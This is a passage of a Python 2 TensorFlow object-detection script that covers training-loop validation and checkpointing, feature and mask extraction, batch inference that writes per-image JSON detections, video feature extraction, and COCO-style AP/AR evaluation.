so_ars_str = "|".join(["%s:%.5f"%(class_,so_ars[class_]) for class_ in so_ars])
tqdm.write("\tval in %s at step %s, AP:%s, AR:%s, so_AP:%s, so_AR:%s, this step val:%.5f, previous best val at %s is %.5f"%(num_val_steps,global_step,aps_str,ars_str,so_aps_str,so_ars_str,validation_performance,best[1],best[0]))
else:
tqdm.write("\tval in %s at step %s, AP:%s, AR:%s, this step val:%.5f, previous best val at %s is %.5f"%(num_val_steps,global_step,aps_str,ars_str,validation_performance,best[1],best[0]))
if validation_performance > best[0]:
tqdm.write("\tsaving best model %s..."%global_step)
bestsaver.save(sess,os.path.join(config.save_dir_best,"model"),global_step=global_step)
tqdm.write("\tdone")
best = (validation_performance,global_step)
isStart = False
if config.exit_after_val:
print("exit after eval.")
break
# skip if the batch is not complete, usually the last few ones
if len(batch[1]) != config.gpu:
continue
try:
#loss, rpn_label_loss, rpn_box_loss, fastrcnn_label_loss, fastrcnn_box_loss, train_op,act_losses = trainer.step(sess,batch)
loss, wds, rpn_label_losses, rpn_box_losses, fastrcnn_label_losses, fastrcnn_box_losses, so_label_losses, act_losses, lr = trainer.step(sess,batch)
except Exception as e:
print(e)
bs = batch[1]
print("trainer error, batch files:%s"%([b.data['imgs'] for b in bs]))
sys.exit()
if math.isnan(loss):
tqdm.write("warning, nan loss: loss:%s,rpn_label_loss:%s, rpn_box_loss:%s, fastrcnn_label_loss:%s, fastrcnn_box_loss:%s"%(loss, rpn_label_losses, rpn_box_losses, fastrcnn_label_losses, fastrcnn_box_losses))
if config.add_act:
tqdm.write("\tact_losses:%s"%(act_losses))
print("batch:%s"%(batch[1][0].data['imgs']))
sys.exit()
# use moving average to compute loss
loss_me.put(loss)
lr_me.put(lr)
for wd, rpn_label_loss, rpn_box_loss, fastrcnn_label_loss, fastrcnn_box_loss, so_label_loss, act_loss in zip(wds, rpn_label_losses, rpn_box_losses, fastrcnn_label_losses, fastrcnn_box_losses, so_label_losses, act_losses):
wd_me.put(wd)
rpn_label_loss_me.put(rpn_label_loss)
rpn_box_loss_me.put(rpn_box_loss)
fastrcnn_label_loss_me.put(fastrcnn_label_loss)
fastrcnn_box_loss_me.put(fastrcnn_box_loss)
so_label_loss_me.put(so_label_loss)
act_loss_me.put(act_loss)
if global_step % config.show_loss_period == 0:
tqdm.write("step %s, moving average: learning_rate %.6f, loss %.6f, weight decay loss %.6f, rpn_label_loss %.6f, rpn_box_loss %.6f, fastrcnn_label_loss %.6f, fastrcnn_box_loss %.6f, so_label_loss %.6f, act_loss %.6f" % (global_step, lr_me.me(), loss_me.me(), wd_me.me(), rpn_label_loss_me.me(), rpn_box_loss_me.me(), fastrcnn_label_loss_me.me(), fastrcnn_box_loss_me.me(), so_label_loss_me.me(), act_loss_me.me()))
# save these for ploting later
stats.append({
"s":float(global_step),
"l":float(loss),
"val":validation_performance
})
isStart = False
# save the last model
if global_step % config.save_period != 0: # time to save model
print("saved last model without evaluation.")
saver.save(sess,os.path.join(config.save_dir,"model"),global_step=global_step)
if config.write_self_sum:
self_summary_strs.writeTo(config.self_summary_path)
with open(config.stats_path,"w") as f:
json.dump(stats,f)
# given the box, extract feature
def boxfeat(config):
imagelist = config.imgpath
images = [line.strip() for line in open(config.imgpath,"r").readlines()]
print("total images to test:%s"%len(images))
if not os.path.exists(config.boxfeatpath):
os.makedirs(config.boxfeatpath)
model = get_model_boxfeat(config) # input image -> final_box, final_label, final_masks
add_coco(config,config.datajson)
tfconfig = tf.ConfigProto(allow_soft_placement=True)
tfconfig.gpu_options.allow_growth = True # this way it will only allocate nessasary gpu, not take all
# or you can set hard limit
#tfconfig.gpu_options.per_process_gpu_memory_fraction = 0.8
with tf.Session(config=tfconfig) as sess:
initialize(load=True,load_best=config.load_best,config=config,sess=sess)
# num_epoch should be 1
assert config.num_epochs == 1
#count=0
for image in tqdm(images,ascii=True):
imagename = os.path.splitext(os.path.basename(image))[0]
with open(os.path.join(config.boxjsonpath,imagename+".json"),"r") as f:
this_data = json.load(f)
boxes = np.asarray(this_data['boxes'],dtype="float") # should be a [K,4] , x,y,w,h
# -> x1,y1,x2,y2
boxes[:, 2] = boxes[:,2] + boxes[:,0]
boxes[:, 3] = boxes[:,3] + boxes[:,1]
feed_dict = model.get_feed_dict(image,boxes)
if config.boxclass:
feature, label_probs = sess.run([model.feature,model.label_probs],feed_dict=feed_dict)
else:
feature, = sess.run([model.feature],feed_dict=feed_dict)
assert len(feature) == len(boxes)
# for debug
"""
print(feature.shape
print(label_probs.shape
for i,label_prob in enumerate(label_probs):
print(label_prob.shape
label = np.argmax(label_prob)
cat_name = config.class_names[label]
ori_cat_name = this_data['cat_names'][i]
ori_cat_id = config.class_to_classId[ori_cat_name]
print("argmax label index:%s, cat_name:%s,logit:%s"%(label,cat_name,label_prob[label])
if label == 0: # 0 is BG, let's get second largest
label2 = label_prob.argsort()[-2:][::-1][1]
print("argmax 2nd label index:%s, cat_name:%s,logit:%s"%(label2,config.class_names[label2],label_prob[label2])
print("original label cat_name:%s,cat_id:%s,cur_logits:%s"%(ori_cat_name,ori_cat_id,label_prob[ori_cat_id])
sys.exit()
"""
np.save(os.path.join(config.boxfeatpath,imagename+".npy"),feature)
# given the box/box_label/box_prob, extract the mask
def givenbox(config):
imagelist = config.imgpath
images = [line.strip() for line in open(config.imgpath,"r").readlines()]
print("total images to test:%s"%len(images))
if not os.path.exists(config.outbasepath):
os.makedirs(config.outbasepath)
model = get_model_givenbox(config)
add_coco(config,config.datajson)
tfconfig = tf.ConfigProto(allow_soft_placement=True)
tfconfig.gpu_options.allow_growth = True
with tf.Session(config=tfconfig) as sess:
initialize(load=True,load_best=config.load_best,config=config,sess=sess)
# num_epoch should be 1
assert config.num_epochs == 1
for image in tqdm(images,ascii=True):
imagename = os.path.splitext(os.path.basename(image))[0]
with open(os.path.join(config.boxjsonpath,imagename+".json"),"r") as f:
this_data = json.load(f) # this is the same output from mask rcnn
def gather_data(box_list):
boxes,box_labels,box_probs = [],[],[]
for one in box_list:
boxes.append(one['bbox'])
box_probs.append(one['score'])
box_classId = config.class_to_classId[one['cat_name']] # [0-80]
assert box_classId > 0, one
box_labels.append(box_classId)
boxes = np.asarray(boxes,dtype="float")
box_labels = np.asarray(box_labels,dtype="int")
box_probs = np.asarray(box_probs,dtype="float")
return boxes, box_labels,box_probs
boxes, box_labels,box_probs = gather_data(this_data)
if boxes.shape[0] == 0:
continue
# boxes should be a [K,4] , x,y,w,h
# -> x1,y1,x2,y2
boxes[:, 2] = boxes[:,2] + boxes[:,0]
boxes[:, 3] = boxes[:,3] + boxes[:,1]
# resized the image and box input
feed_dict,ori_shape,scale = model.get_feed_dict(image,boxes,box_labels,box_probs)
final_boxes,final_labels,final_probs,final_masks = sess.run([model.final_boxes,model.final_labels,model.final_probs,model.final_masks],feed_dict=feed_dict)
final_boxes = final_boxes / scale
final_masks = [fill_full_mask(box,mask,ori_shape) for box,mask in zip(final_boxes,final_masks)]
pred = []
for box, prob, label, mask in zip(final_boxes,final_probs,final_labels,final_masks):
box[2] -= box[0]
box[3] -= box[1] # produce x,y,w,h output
cat_id = config.classId_to_cocoId[label]
# encode mask
rle = None
if config.add_mask:
rle = cocomask.encode(np.array(mask[:,:,None],order="F"))[0]
rle['counts'] = rle['counts'].decode("ascii")
res = {
"category_id":cat_id,
"cat_name":config.class_names[label], #[0-80]
"score":float(round(prob,4)),
"bbox": list(map(lambda x:float(round(x,1)),box)),
"segmentation":rle
}
pred.append(res)
# save the data
resultfile = os.path.join(config.outbasepath,"%s.json"%imagename)
with open(resultfile,"w") as f:
json.dump(pred,f)
# given a list of images, do the forward, save each image result separately
def forward(config):
imagelist = config.imgpath
if config.extract_feat:
assert config.feat_path is not None
assert config.is_fpn
if not os.path.exists(config.feat_path):
os.makedirs(config.feat_path)
print("also extracting fpn features")
all_images = [line.strip() for line in open(config.imgpath,"r").readlines()]
if config.forward_skip > 1:
all_images.sort()
ori_num = len(all_images)
all_images = all_images[::config.forward_skip]
print("skiiping %s, got %s/%s"%(config.forward_skip, len(all_images), ori_num))
if config.check_img_exist:
exist_imgs = []
for image in all_images:
if os.path.exists(image):
exist_imgs.append(image)
print("%s/%s image exists" % (len(exist_imgs), len(all_images)))
all_images = exist_imgs
print("total images to test:%s"%len(all_images))
if config.use_small_object_head:
if not os.path.exists(config.so_outpath):
os.makedirs(config.so_outpath)
#model = get_model(config) # input image -> final_box, final_label, final_masks
#tester = Tester(model,config,add_mask=config.add_mask)
models = []
for i in xrange(config.gpuid_start, config.gpuid_start+config.gpu):
models.append(get_model(config, i, controller=config.controller))
model_final_boxes = [model.final_boxes for model in models]
# [R]
model_final_labels = [model.final_labels for model in models]
model_final_probs = [model.final_probs for model in models]
if config.extract_feat:
model_feats = [model.fpn_feature for model in models]
if config.add_mask:
# [R,14,14]
model_final_masks = [model.final_masks for model in models]
if config.add_act:
if config.act_v2:
model_act_single_boxes = [model.act_single_boxes for model in models]
model_act_single_label_logits = [model.act_single_label_logits for model in models]
else:
model_act_final_boxes = [model.act_final_boxes for model in models]
# [R]
model_act_final_labels = [model.act_final_labels for model in models]
model_act_final_probs = [model.act_final_probs for model in models]
#if not config.diva_class and not config.diva_class2 and not config.diva_class3:
# add_coco(config,config.datajson)
tfconfig = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False)
if not config.use_all_mem:
tfconfig.gpu_options.allow_growth = True # this way it will only allocate nessasary gpu, not take all
tfconfig.gpu_options.visible_device_list = "%s"%(",".join(["%s"%i for i in range(config.gpuid_start, config.gpuid_start+config.gpu)])) # so only this gpu will be used
with tf.Session(config=tfconfig) as sess:
# for packing model, the weights are already loaded
if not config.is_load_from_pb:
initialize(load=True, load_best=config.load_best, config=config, sess=sess)
# num_epoch should be 1
assert config.num_epochs == 1
count=0
for images in tqdm(grouper(all_images,config.im_batch_size),ascii=True):
count+=1
if config.start_from > 0:
if count <= config.start_from:
continue
images = [im for im in images if im is not None]
# multigpu will need full image inpu
this_batch_len = len(images)
if this_batch_len != config.im_batch_size:
need = config.im_batch_size - this_batch_len
images.extend(all_images[:need]) # redo some images
scales = []
resized_images = []
ori_shapes = []
imagenames = []
pathnames = [] # the folder the image is in, for when we want a two-level output
feed_dict = {}
for i,image in enumerate(images):
im = cv2.imread(image,cv2.IMREAD_COLOR)
imagename = os.path.splitext(os.path.basename(image))[0]
pathnames.append(image.split("/")[-2])
imagenames.append(imagename)
ori_shape = im.shape[:2]
# need to resize here, otherwise
# InvalidArgumentError (see above for traceback): Expected size[1] in [0, 83], but got 120 [[Node: anchors/fm_anchors = Slice[Index=DT_INT32, T=DT_FLOAT, _device="/job:localhost/replica:0/task:0/device:GPU:0"](anchors/all_anchors, anchors/fm_anchors/begin, anchors/stack)]]
resized_image = resizeImage(im,config.short_edge_size,config.max_size)
scale = (resized_image.shape[0]*1.0/im.shape[0] + resized_image.shape[1]*1.0/im.shape[1])/2.0
resized_images.append(resized_image)
scales.append(scale)
ori_shapes.append(ori_shape)
feed_dict.update(models[i].get_feed_dict_forward(resized_image))
sess_input = []
if config.just_feat:
outputs = sess.run(model_feats,feed_dict=feed_dict)
for i,feat in enumerate(outputs):
imagename = imagenames[i]
featfile = os.path.join(config.feat_path, "%s.npy"%imagename)
np.save(featfile, feat)
continue # no bounding boxes
if config.add_mask:
for _,boxes,labels,probs,masks in zip(range(len(images)),model_final_boxes,model_final_labels,model_final_probs,model_final_masks):
sess_input+=[boxes,labels,probs,masks]
else:
if config.add_act:
if config.act_v2:
for _,boxes,labels,probs,actboxes,actlabels in zip(range(len(images)),model_final_boxes,model_final_labels,model_final_probs,model_act_single_boxes,model_act_single_label_logits):
sess_input+=[boxes,labels,probs,actboxes,actlabels]
else:
for _,boxes,labels,probs,actboxes,actlabels,actprobs in zip(range(len(images)),model_final_boxes,model_final_labels,model_final_probs,model_act_final_boxes,model_act_final_labels,model_act_final_probs):
sess_input+=[boxes,labels,probs,actboxes,actlabels,actprobs]
else:
if config.extract_feat:
for _,boxes,labels,probs,feats in zip(range(len(images)),model_final_boxes,model_final_labels,model_final_probs,model_feats):
sess_input+=[boxes,labels,probs,feats]
else:
if config.get_rpn_out:
model_proposal_boxes = [model.proposal_boxes for model in models]
model_proposal_scores = [model.proposal_scores for model in models]
for _, boxes, labels, probs, prop_boxes, prop_scores in zip(range(len(images)), model_final_boxes, model_final_labels, model_final_probs, model_proposal_boxes, model_proposal_scores):
sess_input += [boxes, labels, probs, prop_boxes, prop_scores]
else:
if config.use_small_object_head:
model_so_boxes = [model.so_final_boxes for model in models]
model_so_probs = [model.so_final_probs for model in models]
model_so_labels = [model.so_final_labels for model in models]
for _, boxes, labels, probs, so_boxes, so_labels, so_probs in zip(range(len(images)),model_final_boxes,model_final_labels,model_final_probs, model_so_boxes,model_so_labels, model_so_probs):
sess_input += [boxes, labels, probs, so_boxes, so_labels, so_probs]
else:
for _,boxes,labels,probs in zip(range(len(images)),model_final_boxes,model_final_labels,model_final_probs):
sess_input+=[boxes,labels,probs]
outputs = sess.run(sess_input,feed_dict=feed_dict)
if config.add_mask:
pn = 4
else:
pn = 3
if config.add_act:
pn=6
if config.act_v2:
pn=5
else:
if config.extract_feat:
pn=4
elif config.get_rpn_out:
pn=5
elif config.use_small_object_head:
pn=6
outputs = [outputs[i*pn:(i*pn+pn)] for i in xrange(len(images))]
for i,output in enumerate(outputs):
scale = scales[i]
ori_shape = ori_shapes[i]
imagename = imagenames[i]
if config.add_mask:
final_boxes, final_labels, final_probs, final_masks = output
final_boxes = final_boxes / scale
final_masks = [fill_full_mask(box,mask,ori_shape) for box,mask in zip(final_boxes,final_masks)]
else:
if config.add_act:
if config.act_v2:
final_boxes, final_labels, final_probs,actsingleboxes,actsinglelabels = output
actsingleboxes = actsingleboxes / scale
else:
final_boxes, final_labels, final_probs,actboxes,actlabels,actprobs = output
actboxes = actboxes / scale
else:
if config.extract_feat:
final_boxes, final_labels, final_probs, final_feat = output
#print(final_feats.shape# [1,7,7,256]
# save the features
featfile = os.path.join(config.feat_path, "%s.npy"%imagename)
np.save(featfile, final_feat)
else:
if config.get_rpn_out:
final_boxes, final_labels, final_probs, prop_boxes, prop_scores = output
prop_boxes = prop_boxes / scale
props = np.concatenate([prop_boxes, np.expand_dims(prop_scores, axis=-1)], axis=-1) # [K, 5]
# save the proposal boxes,
prop_file = os.path.join(config.rpn_out_path, "%s.npy"%imagename)
np.save(prop_file, props)
else:
if config.use_small_object_head:
final_boxes, final_labels, final_probs, final_so_boxes, final_so_labels, final_so_probs = output
else:
final_boxes, final_labels, final_probs = output
if config.use_cpu_nms:
if not config.no_nms:
final_boxes, final_labels, final_probs = nms_wrapper(final_boxes, final_probs, config)
final_boxes = final_boxes / scale
final_masks = [None for one in final_boxes]
if config.no_nms:
# will leave all K boxes, each box class is the max prob class
# final_boxes would be [num_class-1, K, 4]
# final_probs would be [num_class-1, K]
# final_labels is actually rcnn_boxes, [K, 4]
if config.save_all_box: # save all output as npz file instead
rcnn_boxes = final_labels
rcnn_boxes = rcnn_boxes / scale
# boxes are [x1, y1, x2, y2]
if config.use_frcnn_class_agnostic:
if len(final_boxes) > 0:
assert final_boxes[0, 1, 2] == final_boxes[1, 1, 2]
final_boxes = final_boxes[0, :, :] # [K, 4]
data = {
"rcnn_boxes": rcnn_boxes, # [K, 4]
"frcnn_boxes": final_boxes, # [C, K, 4] / [K, 4]
"frcnn_probs": final_probs, # [C, K] # C is num_class -1
}
target_file = os.path.join(config.outbasepath, "%s.npz"%imagename)
np.savez(target_file, **data)
continue # next image
else:
num_cat, num_box = final_boxes.shape[:2]
# [K]
best_cat = np.argmax(final_probs, axis=0)
# get the final labels first
final_labels = best_cat + 1
# use the final boxes, select the best cat for each box
final_boxes2 = np.zeros([num_box, 4], dtype="float")
for i in xrange(num_box):
final_boxes2[i, :] = final_boxes[best_cat[i], i, :]
final_boxes = final_boxes2
final_probs = np.amax(final_probs, axis=0) # [K]
final_masks = [None for one in final_boxes]
pred = []
for j,(box, prob, label, mask) in enumerate(zip(final_boxes,final_probs,final_labels,final_masks)):
box[2] -= box[0]
box[3] -= box[1] # produce x,y,w,h output
cat_id = int(label)
cat_name = targetid2class[cat_id]
# encode mask
rle = None
if config.add_mask:
rle = cocomask.encode(np.array(mask[:, :, None], order="F"))[0]
rle['counts'] = rle['counts'].decode("ascii")
res = {
"category_id":cat_id,
"cat_name":cat_name, # [0-80]
"score":float(round(prob, 4)),
"bbox": list(map(lambda x:float(round(x,1)),box)),
"segmentation":rle,
}
pred.append(res)
# save the data
outbasepath = config.outbasepath
if config.use_two_level_outpath:
pathname = pathnames[i]
outbasepath = os.path.join(config.outbasepath, pathname)
if not os.path.exists(outbasepath):
os.makedirs(outbasepath)
resultfile = os.path.join(outbasepath, "%s.json"%imagename)
with open(resultfile,"w") as f:
json.dump(pred,f)
if config.use_small_object_head:
so_pred = []
for j,(so_box, so_prob, so_label) in enumerate(zip(final_so_boxes, final_so_probs, final_so_labels)):
so_box[2] -= so_box[0]
so_box[3] -= so_box[1] # produce x,y,w,h output
# so_label is the class id in the small objects,
# here the cat_id should follow the original class
cat_name = config.small_objects_targetid2class[so_label]
cat_id = targetClass2id[cat_name]
res = {
"category_id": cat_id,
"cat_name": cat_name,
"score": float(round(so_prob, 4)),
"bbox": list(map(lambda x:float(round(x,1)), so_box)),
"segmentation": None,
}
so_pred.append(res)
resultfile = os.path.join(config.so_outpath,"%s.json"%imagename)
with open(resultfile,"w") as f:
json.dump(so_pred,f)
if config.add_act:
act_pred = []
if config.act_v2:
# assemble the single boxes and pair boxes?
topk=config.act_single_topk
single_act_boxes,single_act_labels,single_act_probs = gather_act_singles(actsingleboxes,actsinglelabels,topk)
for j,(act_box, act_prob, act_label) in enumerate(zip(single_act_boxes,single_act_probs,single_act_labels)):
act_box[2] -= act_box[0]
act_box[3] -= act_box[1]
act_name = targetsingleactid2class[act_label]
res = {
"category_id":act_label,
"cat_name":act_name,
"score":float(round(act_prob,4)),
"bbox": list(map(lambda x:float(round(x,1)),act_box)),
"segmentation":None,
"v2":1,
"single":1,
}
act_pred.append(res)
else:
for j,(act_box, act_prob, act_label) in enumerate(zip(actboxes,actprobs,actlabels)):
act_box[2] -= act_box[0]
act_box[3] -= act_box[1]
act_name = targetactid2class[act_label]
res = {
"category_id":act_label,
"cat_name":act_name,
"score":float(round(act_prob,4)),
"bbox": list(map(lambda x:float(round(x,1)),act_box)),
"segmentation":None,
"v2":0,
}
act_pred.append(res)
# save the act data
resultfile = os.path.join(config.actoutbasepath,"%s.json"%imagename)
with open(resultfile,"w") as f:
json.dump(act_pred,f)
from glob import glob
# only get fpn backbone feature for each video, no object detection
def videofeat(config):
assert config.feat_path is not None
assert config.is_fpn
assert config.videolst is not None
if not os.path.exists(config.feat_path):
os.makedirs(config.feat_path)
# imgpath is the frame path,
# need videolst
# we get all the image first
print("getting imglst...")
imgs = {}# videoname -> frames
total=0
for videoname in [os.path.splitext(os.path.basename(l.strip()))[0] for l in open(config.videolst).readlines()]:
framepath = os.path.join(config.imgpath, "%s"%videoname)
frames = glob(os.path.join(framepath, "*.jpg"))
frames.sort()
frames = frames[::config.forward_skip] # some only have 1-3 frames
imgs[videoname] = frames
total+=len(frames)
print("done, got %s imgs"%total)
#model = get_model(config) # input image -> final_box, final_label, final_masks
#tester = Tester(model,config,add_mask=config.add_mask)
models = []
for i in xrange(config.gpuid_start, config.gpuid_start+config.gpu):
models.append(get_model(config,i,controller=config.controller))
model_feats = [model.fpn_feature for model in models]
tfconfig = tf.ConfigProto(allow_soft_placement=True)
if not config.use_all_mem:
tfconfig.gpu_options.allow_growth = True # this way it will only allocate nessasary gpu, not take all
# or you can set hard limit
#tfconfig.gpu_options.per_process_gpu_memory_fraction = 0.8
with tf.Session(config=tfconfig) as sess:
initialize(load=True,load_best=config.load_best,config=config,sess=sess)
# num_epoch should be 1
assert config.num_epochs == 1
#count=0
for videoname in tqdm(imgs,ascii=True):
if config.skip:
if os.path.exists(os.path.join(config.feat_path,"%s.npy"%videoname)):
continue
feats = []
for images in tqdm(grouper(imgs[videoname],config.im_batch_size),ascii=True):
images = [im for im in images if im is not None]
# multigpu will need full image inpu
this_batch_len = len(images)
need=0
if this_batch_len != config.im_batch_size:
need = config.im_batch_size - this_batch_len
repeats = [imgs[videoname][0] for i in xrange(need)]
images.extend(repeats) # redo some images
feed_dict = {}
for i,image in enumerate(images):
im = cv2.imread(image,cv2.IMREAD_COLOR)
resized_image = resizeImage(im,config.short_edge_size,config.max_size)
feed_dict.update(models[i].get_feed_dict_forward(resized_image))
sess_input = []
outputs = sess.run(model_feats,feed_dict=feed_dict)
this_feats = []
for i,feat in enumerate(outputs[:len(outputs)-need]): # ignore the repeated ones
this_feats.append(feat)
assert len(this_feats) == this_batch_len
feats.extend(this_feats)
feats = np.array(feats)
# (380, 1, 7, 7, 256)
feats = np.squeeze(feats,axis=1)
feat_file = os.path.join(config.feat_path,"%s.npy"%videoname)
np.save(feat_file, feats)
def read_data_coco(datajson,config,add_gt=False,load_coco_class=False):
with open(datajson,"r") as f:
dj = json.load(f)
if load_coco_class:
add_coco(config,datajson)
data = {"imgs":[],'ids':[]}
if add_gt:
data = {"imgs":[],'ids':[],"gt":[]}
# read coco annotation file
for one in dj['images']:
imgid = int(one['id'])
imgfile = os.path.join(config.imgpath,one['file_name'])
if config.coco2014_to_2017:
imgfile = os.path.join(config.imgpath,one['file_name'].split("_")[-1])
data['imgs'].append(imgfile)
data['ids'].append(imgid)
if add_gt:
# load the bounding box and so on
pass
return Dataset(data,add_gt=add_gt)
# for testing, dataset -> {"imgs":[],'ids':[]}, imgs is the image file path,
def forward_coco(dataset,num_batches,config,sess,tester,resize=True):
assert not config.diva_class # not working for this yet
# "id" -> (boxes, probs, labels, masks)
#pred = {}
# each is (image_id,cat_id,bbox,score,segmentation)
pred = []
for evalbatch in tqdm(dataset.get_batches(config.im_batch_size,num_batches=num_batches,shuffle=False,cap=True),total=num_batches):
_, batches = evalbatch
scales = []
ori_shapes = []
image_ids = []
for batch in batches:
# load the image here and resize
image = cv2.imread(batch.data['imgs'][0],cv2.IMREAD_COLOR)
assert image is not None,batch.data['imgs'][0]
image = image.astype("float32")
imageId = batch.data['ids'][0]
image_ids.append(imageId)
batch.data['imgdata'] = [image]
#if imageId != 139:
# continue
# resize image
# ppwwyyxx's code do resizing in eval
if resize:
resized_image = resizeImage(image,config.short_edge_size,config.max_size)
else:
resized_image = image
# rememember the scale and original image
ori_shape = image.shape[:2]
#print(image.shape, resized_image.shape
# average H/h and W/w ?
scale = (resized_image.shape[0]*1.0/image.shape[0] + resized_image.shape[1]*1.0/image.shape[1])/2.0
batch.data['resized_image'] = [resized_image]
scales.append(scale)
ori_shapes.append(ori_shape)
outputs = tester.step(sess,evalbatch)
for i,output in enumerate(outputs):
scale = scales[i]
ori_shape = ori_shapes[i]
imgid = image_ids[i]
if config.add_mask:
final_boxes, final_labels, final_probs, final_masks = output
final_boxes = final_boxes / scale
final_masks = [fill_full_mask(box,mask,ori_shape) for box,mask in zip(final_boxes,final_masks)]
else:
final_boxes, final_labels, final_probs = output
final_boxes = final_boxes / scale
final_masks = [None for one in final_boxes]
for box, prob, label, mask in zip(final_boxes,final_probs,final_labels,final_masks):
box[2] -= box[0]
box[3] -= box[1]
cat_id = config.classId_to_cocoId[label]
# encode mask
rle = None
if config.add_mask:
rle = cocomask.encode(np.array(mask[:,:,None],order="F"))[0]
rle['counts'] = rle['counts'].decode("ascii")
res = {
"image_id":imgid,#int
"category_id":cat_id,
"cat_name":config.class_names[label], #[0-80]
"score":float(round(prob,4)),
"bbox": list(map(lambda x:float(round(x,1)),box)),
"segmentation":rle
}
pred.append(res)
#print([(one['category_id'],one['score'],one['bbox']) for one in pred]
#print(imageId
#sys.exit()
return pred
# test on coco dataset
def test(config):
test_data = read_data_coco(config.datajson,config=config,add_gt=False,load_coco_class=True)
print("total testing samples:%s"%test_data.num_examples)
#model = get_model(config) # input image -> final_box, final_label, final_masks
#tester = Tester(model,config,add_mask=config.add_mask)
models = []
for i in xrange(config.gpuid_start, config.gpuid_start+config.gpu):
models.append(get_model(config,i,controller=config.controller))
tester = Tester(models,config,add_mask=config.add_mask)
tfconfig = tf.ConfigProto(allow_soft_placement=True)
if not config.use_all_mem:
tfconfig.gpu_options.allow_growth = True # this way it will only allocate nessasary gpu, not take all
# or you can set hard limit
#tfconfig.gpu_options.per_process_gpu_memory_fraction = 0.4
with tf.Session(config=tfconfig) as sess:
initialize(load=True,load_best=config.load_best,config=config,sess=sess)
# num_epoch should be 1
assert config.num_epochs == 1
num_steps = int(math.ceil(test_data.num_examples/float(config.im_batch_size)))*config.num_epochs
# a list of imageids
pred = forward_coco(test_data,num_steps,config,sess,tester,resize=True)
#with open("coco.json","w") as f:
# json.dump(pred,f)
if config.use_coco_eval:
evalcoco(pred,config.datajson,add_mask=config.add_mask)
else:
# check our AP implementation, use our map implementation
# load the annotation first
all_cat_ids = {}
with open(config.datajson,"r") as f:
data = json.load(f)
gt = {} # imageid -> boxes:[], catids
for one in data['annotations']:
cat_id = one['category_id']
all_cat_ids[cat_id] = 1
imageid = int(one['image_id'])
if not gt.has_key(imageid):
gt[imageid] = {} # cat_ids -> boxes[]
#gt[imageid]['boxes'].append(one['bbox']) # (x,y,w,h), float
#gt[imageid]['cat_ids'].append(one['category_id'])
if not gt[imageid].has_key(cat_id):
gt[imageid][cat_id] = []
gt[imageid][cat_id].append(one['bbox'])
print("total category:%s"%len(all_cat_ids))
# get the aps/ars for each frame
dt = {} # imageid -> cat_id -> {boxes,scores}
for one in pred:
imageid = one['image_id']
dt_bbox = one['bbox']
score = one['score']
cat_id = one['category_id']
if not dt.has_key(imageid):
dt[imageid] = {}
if not dt[imageid].has_key(cat_id):
dt[imageid][cat_id] = []
dt[imageid][cat_id].append((dt_bbox,score))
# get eval for each image
"""
aps = {class_:[] for class_ in all_cat_ids}
ars = {class_:[] for class_ in all_cat_ids}
for imageid in gt:
for cat_id in gt[imageid]:
if not dt.has_key(imageid):
ars[cat_id].append(0.0)
else:
d = []
dscores = []
if dt[imageid].has_key(cat_id):
# sort the boxes based on the score first
dt[imageid][cat_id].sort(key=operator.itemgetter(1),reverse=True)
for boxes,score in dt[imageid][cat_id]:
d.append(boxes)
dscores.append(score)
g = gt[imageid][cat_id]
dm,gm = match_detection(d, g, cocomask.iou(d,g,[0 for _ in xrange(len(g))]),iou_thres=0.5)
ap = computeAP(dm)
ar = computeAR(dm,gm,recall_k=10)
aps[cat_id].append(ap)
ars[cat_id].append(ar)
# aggregate the aps and ars
aps = [sum(aps[cat_id])/float(len(aps[cat_id])) for cat_id in aps.keys()]
ars = [sum(ars[cat_id])/float(len(ars[cat_id])) for cat_id in ars.keys()]
mean_ap = sum(aps)/len(aps)
mean_ar = sum(ars)/len(ars)
"""
# accumulate all detection and compute AP once
e = {} # imageid -> catid
start = time.time()
for imageid in gt:
e[imageid] = {}
for cat_id in gt[imageid]:
g = gt[imageid][cat_id]
e[imageid][cat_id] = {
"dscores":[],
"dm":[],
"gt_num":len(g),
}
d = []
dscores = []
if dt.has_key(imageid) and dt[imageid].has_key(cat_id):
# sort the boxes based on the score first
dt[imageid][cat_id].sort(key=operator.itemgetter(1),reverse=True)
for boxes,score in dt[imageid][cat_id]:
d.append(boxes)
dscores.append(score)
dm,gm = match_detection(d,g,cocomask.iou(d,g,[0 for _ in xrange(len(g))]),iou_thres=0.5)
e[imageid][cat_id]['dscores'] = dscores
e[imageid][cat_id]['dm'] = dm
# accumulate results
maxDet = 100 # max detection per image per category
aps = {}
ars = {}
for catId in all_cat_ids:
# put all detection scores from all image together
dscores = np.concatenate([e[imageid][catId]['dscores'][:maxDet] for imageid in e if e[imageid].has_key(catId)])
# sort
inds = np.argsort(-dscores,kind="mergesort")
dscores_sorted = dscores[inds]
# put all detection annotation together based on the score sorting
dm = np.concatenate([e[imageid][catId]['dm'][:maxDet] for imageid in e if e[imageid].has_key(catId)])[inds]
num_gt = np.sum([e[imageid][catId]['gt_num'] for imageid in e if e[imageid].has_key(catId)])
aps[catId] = computeAP(dm)
ars[catId] = computeAR_2(dm,num_gt)
mean_ap = np.mean([aps[catId] for catId in aps])
mean_ar = np.mean([ars[catId] for catId in ars])
took = time.time() - start
print("total dt image:%s, gt image:%s"%(len(dt),len(gt)))
print("mean AP with IoU 0.5:%s, mean AR with max detection %s:%s, took %s seconds"%(mean_ap,maxDet,mean_ar,took))
# https://stackoverflow.com/questions/38160940/how-to-count-total-number-of-trainable-parameters-in-a-tensorflow-model
def cal_total_param():
total = 0
for var in tf.trainable_variables():
shape = var.get_shape()
var_num = 1
for dim in shape:
var_num*=dim.value
total+=var_num
return total
def mkdir(path):
if not os.path.exists(path):
os.makedirs(path)
import threading
from utils import parse_nvidia_smi, sec2time
gpu_util_logs = []
gpu_temp_logs = []
# use nvidia-smi to
def log_gpu_util(interval, gpuid_range):
global gpu_util_logs
while True:
time.sleep(interval)
gpu_temps, gpu_utils = parse_nvidia_smi(gpuid_range)
gpu_util_logs.extend(gpu_utils)
gpu_temp_logs.extend(gpu_temps)
if __name__ == "__main__":
config = get_args()
if config.mode == "pack":
config.is_pack_model = True
if config.is_pack_model:
pack(config)
else:
if config.log_time_and_gpu:
gpu_log_interval = 10 # every k seconds
start_time = time.time()
gpu_check_thread = threading.Thread(target=log_gpu_util, args=[gpu_log_interval, (config.gpuid_start, config.gpu)])
gpu_check_thread.daemon = True
gpu_check_thread.start()
if config.mode == "train":
train_diva(config)
elif config.mode == "test":
test(config)
elif config.mode == "forward":
forward(config)
elif config.mode == "boxfeat": # given image list and each image's box, extract CNN feature
boxfeat(config)
elif config.mode == "givenbox":
